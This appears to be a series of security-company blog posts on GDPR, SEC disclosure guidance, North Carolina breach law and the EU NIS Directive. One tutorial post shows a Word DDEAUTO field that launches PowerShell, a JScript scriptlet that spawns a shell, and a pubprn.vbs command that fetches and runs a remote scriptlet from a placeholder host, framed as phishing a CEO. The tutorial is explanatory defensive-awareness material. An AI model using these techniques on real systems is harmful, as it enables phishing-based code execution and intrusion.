Instead we’ve conveniently distilled all of our extensive GDPR travel wisdom into our new white paper.

What’s the best route through GDPR? We’ve developed a practical three-step approach. First, we explain how to use Varonis to monitor and identify risks in your file system environment by finding sensitive personal data with overly permissive access policies. Second, we guide you on the preventive actions to protect your data based on the previous analysis by restricting access rights and eliminating stale or unused data. And third, we offer advice on how to sustain and maintain your GDPR compliance through actively detecting security threats and using this feedback to update your IT policies.

Don’t delay! Download our GDPR travel guide today, and bon voyage. 


New SEC Guidance on Reporting Data Security Risk

In our recent post on a 2011 SEC cybersecurity guidance, we briefly sketched out what public companies are supposed to be doing in terms of informing investors about risks related to security threats and actual incidents. As it happens, late last month the SEC issued a further guidance on cybersecurity disclosures, which “reinforces and expands” on the older one. Coincidence?

Of course! But it’s a sign of the times that we’re all thinking about how to take into account data security risks in business planning.

Just to refresh memories, the SEC asked public companies to report data security risks and incidents that have a “material impact” and that reasonable investors would want to know about. The reports can be filed annually in a 10-K, quarterly in a 10-Q, or, if need be, in a current report or 8-K.

Nowhere in the SEC laws and relevant regulations do the words data security or security risk show up. Instead “material risks”, “materiality”, and “material information” are heavily sprinkled throughout —  lawyer-speak for business data and events worth letting investors know about.

Looking for Material

It’s probably best to quote directly from the SEC guidance on the subject of materiality:

The materiality of cybersecurity risks or incidents depends upon their nature, extent, and potential magnitude, particularly as they relate to any compromised information or the business and scope of company operations. The materiality of cybersecurity risks and incidents also depends on the range of harm that such incidents could cause. This includes harm to a company’s reputation, financial performance, and customer and vendor relationships, as well as the possibility of litigation or regulatory investigations …

An important point to make about the SEC language above is that it’s not about any one particular thing — report ransomware, or a DoS attack — but rather, as the lawyers say, you have to do a fact-based inquiry. If you want to get more of a flavor of this kind of analysis, check out this legal perspective.

However, the SEC does provide some insight into evaluating reportable security risks. The complete list is in the guidance, but here are a few that would be most relevant to IOS readers: the occurrence of prior cybersecurity incidents, the probability and magnitude of a future incident, the adequacy of preventive actions taken to reduce cybersecurity risk, the potential for reputational harm, and litigation, regulatory, and remediation costs.

What about the types of real-world incidents that would have to be disclosed or reported?

I searched and searched, and I did find an example buried in a footnote — wonks can peruse the amazing footnote 33. It’s probably not a great surprise to learn that investors would be interested in knowing when “compromised information might include personally identifiable information, trade secrets or other confidential business information, the materiality of which may depend on the nature of the company’s business, as well as the scope of the compromised information.”

In short, the SEC guidance is just telling us what we in data security already know: the exposure of sensitive PII, such as social security and credit card numbers, or passwords to bank accounts, or trade secrets regarding, say, a cryptocurrency application, is worth notifying not only security staff about, but investors as well.

Something Noteworthy: Security Policies and Procedures

Sure, the typical regulatory verbiage can quickly put you into REM sleep, but occasionally there’s something new and noteworthy buried in the text.

And this latest SEC guidance does have some carefully worded advice regarding cybersecurity procedures and policies. The SEC “encourages” public companies to have them, and to review their compliance. It also asks companies to review their cybersecurity disclosure controls and procedures, and to make sure they are sufficient to notify senior management so they can properly report it.

It’s worth repeating that SEC rules and regulations cover general business risk, not specifically cybersecurity risk. The guidance recommends that companies evaluate this special risk and inform investors when the risks change, and of course let them know about material cybersecurity incidents.

Musings on Cybersecurity Disclosures for Public Companies

In the US, unlike in the EU, there is no single federal data security and breach notification law that covers private sector companies. Sure, we do have HIPAA and GLBA for healthcare and financial, but there isn’t an equivalent to the EU’s GDPR or, say, Canada’s PIPEDA. I’m aware that we have state breach notification laws, but for the most part they’re limited in the PII they cover and have a fairly high threshold for reporting incidents.

However, with this last SEC guidance, we have, for the first time, something like a national data security rule of thumb — not an obligation but rather a strong suggestion — to have data security controls and reporting in place.

The SEC guidance is based on what investors should be made aware of and wouldn’t necessarily cover serious cybersecurity risks and incidents that don’t have a material financial or business impact.

However, it’s certainly an indication that change is afoot, and US public companies should be thinking about upping their data security game before they’re ultimately required to do so through a future law.

Let’s just say they have been warned.

North Carolina Proposes Tougher Breach Notification Rules

If you’ve been reading our amazing blog content and whitepaper on breach notification laws in the US and worldwide, you know there’s often a hidden loophole in the legalese. The big issue — at least for data security nerds — is whether the data security law considers mere unauthorized access of personally identifiable information (PII) to be worthy of a notification.

This was a small legal point until something called ransomware came along.

You have heard of ransomware, right?

It’s that low-tech, but deadly malware that accesses data and encrypts it. To get the data back, the victim has to send a couple of bitcoins to the digital extortionists.

Last year ransomware had more than a few high-profile victims in the US, as well as, of course, across the globe.

But at the US state level, the difference between access alone and access and acquisition — the legal verbiage for copying — in a notification law determines whether the breach is to be reported to local authorities.

Based on my own research, I could only find a few states for which a ransomware attack would have to be reported locally. I should add that even for states that allow for just unauthorized access of PII, there’s often an additional “harm threshold” to the consumer — financial or credit risk, for example — that would have to be met, and so would rule out a pure ransomware attack in which the data wasn’t copied.

After factoring this in, I found only three states for which a ransomware attack ipso facto — I finally get to use that phrase! — would require a notification: New Jersey, Connecticut, and Virginia.

You can look through these charts prepared by some law firms for yourself, and if you come up with other candidates, let me know!

North Carolina: Laboratory of Democracy!

But wait: last month, a legislator in the great state of North Carolina, along with the attorney general, proposed a change to the statutory language defining a breach.

This tweak moves NC from a state that considers a breach to be unauthorized access and acquisition — see section 75-61 (14) of its statutes — to unauthorized access or acquisition.

Now NC joins the aforementioned club, in which ransomware attacks will by themselves force companies to notify authorities and consumers.

The new law will also change the time window in which the data breach will have to be reported after discovery. Searching through a huge PDF table of state breach laws, I can say most if not all states ask that a breach be reported “without unreasonable delay.”

Obviously, these words can be subject to interpretation. The proposed NC law instead sets the time limit to just 15 days.

I’m not aware of any other state that has a specific deadline.

The new law also adds consumer-friendly language that makes credit freezes — remember the outcry after Equifax — free upon request. Up to five years of credit monitoring will also be free of charge.

The law is supposed to tighten the rules on fines as well.

We’ll have to wait for the legislation to be reviewed and approved before we have the final legal details.

We’ll keep you posted.

North Carolina Has Lots of Breaches

Looking at the state’s 2017 annual breach report, produced by its Department of Justice, I was surprised to learn that over 1,000 breaches were reported in this state alone.

That’s an incredibly large number. For comparison purposes, take a peek at California’s breach report for the years 2012–2015. The incident counts are dramatically smaller — 178 in 2015.

I’m not sure what explains the difference, but perhaps NC simply has lots of law-abiding businesses, especially consumer-facing ones holding PII.

By the way, the current NC law covers an extensive list of identifiers, not only the usual social security, driver’s license, and account numbers, but also PINs, online passwords, digital signatures, and email addresses. This broad PII definition may have something to do with the NC data breach reporting spike we’re seeing.

In any case, if you combine its generous list of PII and the newer breach notification rules, then you’ll have to admit that NC has upped its digital security game and may even be number one, moving past the formidable California and its tough breach law.

And of course, go Wolfpack.

Want to be a legal eagle among your IT security peers when it comes to breach notification laws and ransomware? Download our comprehensive white paper on this fascinating subject!

Adventures in Malware-Free Hacking, Part IV

For this next post, I was all ready to dive into a more complicated malware-free attack scenario involving multiple stages and persistence. Then I came across an incredibly simple code-free attack — no Word or Excel macro required! — that far more effectively proves the underlying premise in this series: it ain’t that hard to get past the perimeter.

The first attack I’ll describe is based on a Microsoft Word vulnerability involving the archaic Dynamic Data Exchange (DDE) protocol. It was only very recently patched. The second one leverages a more general vulnerability with Microsoft COM and its object passing capabilities.

Back to the DDE Future

Does anyone remember DDE? Probably not. It was an early inter-process communication protocol that allowed apps and devices to pass data.

I’m a little familiar with it because I used to review and test telecom gear — well, someone had to do it. At the time, DDE let caller IDs pass to CRM apps that would ultimately pop up a customer contact record for call center agents. Yeah, you had to connect an RS-232 cable between the phone and the computer. Those were the days!

As it turns out, at this late date, Microsoft Word still supports DDE.

What makes this attack effectively code-free is that you can access the DDE protocol directly from Word field codes. (Hat tip to SensePost for researching and writing about it.)

Field codes are another ancient MS Word feature that lets you add dynamic text and a bit of programming into a document. The most obvious example is page numbers, which can be inserted into a footer using the field code {PAGE \*MERGEFORMAT}, allowing page numbers to be magically generated.

Pro tip: you can access field codes from the text section of the Word ribbon.

I remember first discovering this Word feature as a young lad and being amazed.

Until the patch disabled it, Word supported a DDE field option. The idea was that DDE would let Word communicate with an app and then embed the output in the document. This was an early version of an idea — communicating with external apps — that was later taken over by COM, which we’ll get to below.

Anyway, hackers realized that the DDE app can be, wait for it, a vanilla command shell! The command shell, of course, launches PowerShell and from there hackers can do just about anything.

In the screenshot below, you can see how I used the stealthy technique introduced a few posts back: the teeny PowerShell script in the DDE field downloads more PowerShell, which then starts the second phase of the attack.

Thank you Windows for warning us that an embedded DDEAUTO field sneakily launches a shell.

The preferred method is to use a variant, the DDEAUTO field, which automatically launches the script when the Word document is opened.
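For reference, the field code looked something like this. It’s Word field syntax, not PowerShell, so it’s shown as a comment, and the payload here is a harmless stand-in:

# The Word field code (insert via Ctrl+F9), per SensePost's research:
#   { DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c <payload>" }
# cmd.exe is the DDE "application"; everything after /k goes to PowerShell.
# A harmless stand-in for <payload>:
Write-Host 'You have been DDE-d!'   # my real test pulled a remote PS script instead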

Let’s step back.

As a beginning hacker, you can send a scary phish mail, pretending to be from the IRS, and embed a DDEAUTO field with a teeny first-stage PS script. You don’t have to do any real coding with the MS macro library, as I did in the last post.

The CEO opens the Word doc, the embedded script is activated, and the hacker is effectively inside the laptop. In my case, the remote PS script pops up a message, but it could just as easily have launched a PS Empire client that would grant shell access.

And before you can say Macedonia, the hackers are the wealthiest teenagers in their village.

A shell was launched without any real coding. Even a Macedonian child could do this!

It’s so easy!

DDE and Fields

After some prodding, Microsoft disabled DDE in Word, but at first they said that the feature was just being misused. Their reluctance is somewhat understandable.

From what I can see (based on a sample of one data security company), IT groups typically leave field updating on document open enabled and disable Word macros (with notification). By the way, you can find the relevant configuration settings in Word’s Options section.

However, even when field updating is enabled, Microsoft Word additionally prompts the user when a field is accessing remote data, as is the case with DDE (see above). Microsoft does indeed warn you.

But as we know from Dr. Zinaida Benenson, users will click away and ultimately activate the field update.

This is a roundabout way of thanking Microsoft for disabling the dangerous DDE feature.

How difficult is it to find an unpatched Windows environment?

For my own testing, I used AWS Workspaces to access a virtual desktop. And it was pretty easy to obtain an unpatched VM with MS Office that let me insert a DDEAUTO field.

No doubt there are, cough, more than a few corporate sites that still haven’t added the security patch.

The Mystery of Objects

Even if you’ve applied the patch, there are other security holes in MS Office that let hackers accomplish something very similar to what we did with Word. In this next scenario, we’ll learn how to leverage Excel as the phish bait in a code-free attack.

To understand this scenario, let’s step back a little and consider Microsoft’s Component Object Model, or COM.

COM has been around since the 1990s and is described as a “language neutral, object-oriented component model” based on remote procedure calls. Read this StackOverflow post for basic COM definitions and terminology.

Generally, you can think of a COM app as Excel or Word or some other running binary executable.
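To see COM in action, here’s a minimal PowerShell sketch, assuming Excel is installed on the machine, that drives Excel entirely through its COM interface:

$excel = New-Object -ComObject Excel.Application   # ask COM for an Excel Application object
$excel.Visible = $true                             # make the Excel window appear on screen
$excel.Workbooks.Add() | Out-Null                  # create a blank workbook, one COM call at a time
$excel.Quit()                                      # shut the instance back down

PowerShell never touches the Excel binary directly; it just asks COM for the registered Excel.Application object and calls its methods.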

As with all things Microsoft, it’s more complicated than that. It turns out that a COM app can also be a script: JScript or VBScript. Technically, it’s called a scriptlet. You may have seen the .sct extension on a Windows file, which is the official suffix for scriptlets. These scriptlets are essentially scripting code encased in XML (below).

<?xml version="1.0"?>
<scriptlet>
<registration
    description="test"
    progid="test"
    version="1.00"
    classid="{BBBB4444-0000-0000-0000-0000FAADACDC}"
    remotable="true">
</registration>
<script language="JScript">
<![CDATA[

// On instantiation, spawn a command shell that runs a harmless PowerShell one-liner
var r = new ActiveXObject("WScript.Shell").Run("cmd /k powershell -c Write-Host You have been scripted!");

]]>
</script>
</scriptlet>

Hackers and pen testers discovered that there are Windows utilities and apps that accept COM objects and, by extension, these user-crafted COM scriptlets.

Let’s call it a day!

Your homework is to watch this Derbycon video from 2016, which explains how hackers and pen testers have taken advantage of scriptlets. And also read this post on scriptlets and something called monikers.

To get ahead of the story, I can pass a scriptlet to a Windows utility, written in VBS, known as pubprn, which is buried in C:\Windows\system32\Printing_Admin_Scripts. By the way, there are other Windows utilities that take objects as parameters; we’ll just look at this particular one first.

It’s only natural that you can launch a shell from a printing script. Go Microsoft!

For my own testing, I crafted a simple remote scriptlet that launches a shell and prints a “boo” message. Effectively, pubprn instantiates the scriptlet object, thereby allowing the embedded script code to launch a shell.
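For reference, the invocation looks roughly like this. The en-US subfolder is where pubprn.vbs lives on an English-language system, and the example.com URL is a placeholder for wherever the .sct file is actually hosted:

cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://example.com/boo.sct

The second argument is supposed to be a printer path, but pubprn hands it to GetObject(), and the script: moniker tells Windows to fetch and instantiate the remote scriptlet instead.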

This technique provides obvious advantages to hackers who want to “live off the land” and lurk in your system undetected.

In the next post, I’ll explain how COM scriptlets can be exploited by hackers within an Excel spreadsheet.


Post-Davos Thoughts on the EU NIS Directive

I’ve been meaning to read the 80-page report published by the World Economic Forum (WEF) on the global risks humankind now faces. They’re the same folks who bring you the once-a-year gathering of the world’s bankers and other lesser humanoids held at a popular Swiss ski resort. I was told there was an interesting section on … data security.

And there was. Data security is part of a report intended to help our world leaders also grapple with climate change, nuclear annihilation, pandemics, economic meltdowns, starvation, and terrorism.

How serious a risk are cyber attacks?

In terms of impact, digital warfare makes the WEF top-ten list of global issues, ranking sixth, between water and food crises, and beating out the spread of infectious diseases in tenth position. It’s practically a fifth horseman of the apocalypse.

Among the worrying factoids that the WEF brought to the attention of presidents, prime ministers, chancellors, and kings: in 2016, over 350 million malware variants were unleashed on the world, and by 2020, malware may potentially find its way onto over 8.4 billion IoT devices.

There are about 7.6 billion of us now, so we’ll soon be outnumbered by poorly secured, internet-connected, silicon-based gadgets. It’s not a very comforting thought.

The WEF then tried to calculate the economic damage of malware. One study they reference puts the global cost at $8 trillion over the next five years.

The gloomy WEF authors single out the economic impact of ransomware. Petya and NotPetya were responsible for large costs to many companies in 2017. Merck, FedEx, and Maersk, for example, each reported offsets to their bottom line of over $300 million last year as a result of NotPetya attacks.

Systemic Risk: We’re All Connected

However, the effects of malware extend beyond economics. One of the important points the report makes is that hackers are also targeting physical infrastructure.

WannaCry was used against the IT systems of railway providers, car manufacturers, and energy utilities. In other words, cyberattacks are disrupting the real world: lights going out, transportation halted, factory lines shut down, all because of malware.

And here’s where the WEF report gets especially frightening. Cyber attacks can potentially start a chain reaction of effects that we humans are not good at judging. They call it “systemic risk”.

They put it this way:

“Humanity has become remarkably adept at understanding how to mitigate countless conventional risks that can be relatively easily isolated and managed with standard risk management approaches. But we are much less competent when it comes to dealing with complex risks in systems characterized by feedback loops, tipping points and opaque cause-and-effect relationships that can make intervention problematic.”

You can come up with your own doomsday scenarios – malware infects stock market algorithms leading to economic collapse and then war – but the more important point, I think, is that our political leaders will be forced to start addressing this problem.

And yes, I’m talking about more regulations or stricter standards for the IT systems used to run our critical infrastructure.

NIS Directive

In the EU, the rules of the road for protecting this infrastructure are far more evolved than in the US. We wrote about the Network and Information Security (NIS) Directive way back in 2016 when it was first approved by the EU Parliament.

The Directive asks EU member states to improve co-operation regarding cyber-attacks against critical sectors of the economy — health, energy, banking, telecom, transportation, as well as some online businesses — and to set minimum standards for cyber security preparedness, including incident notification to regulators. The EU countries had 21 months to “transpose” the directive into national laws.

That puts the deadline for these NIS laws at May 2018, which is just a few months away. Yes, May will be a busy month for IT departments as both the GDPR and NIS go into effect.

For example, the UK recently ended the consultation period for its NIS law. You can read the results of the report here. One key thing to keep in mind is that each national data regulator or authority will be asked to designate operators of “essential services”, EU-speak for critical infrastructure. They have six months, starting in May, to do this.

Anyway, the NIS Directive is a very good first step in monitoring and evaluating malware-based systemic risk. We’ll keep you posted as we learn more from the national regulators as they start implementing their NIS laws.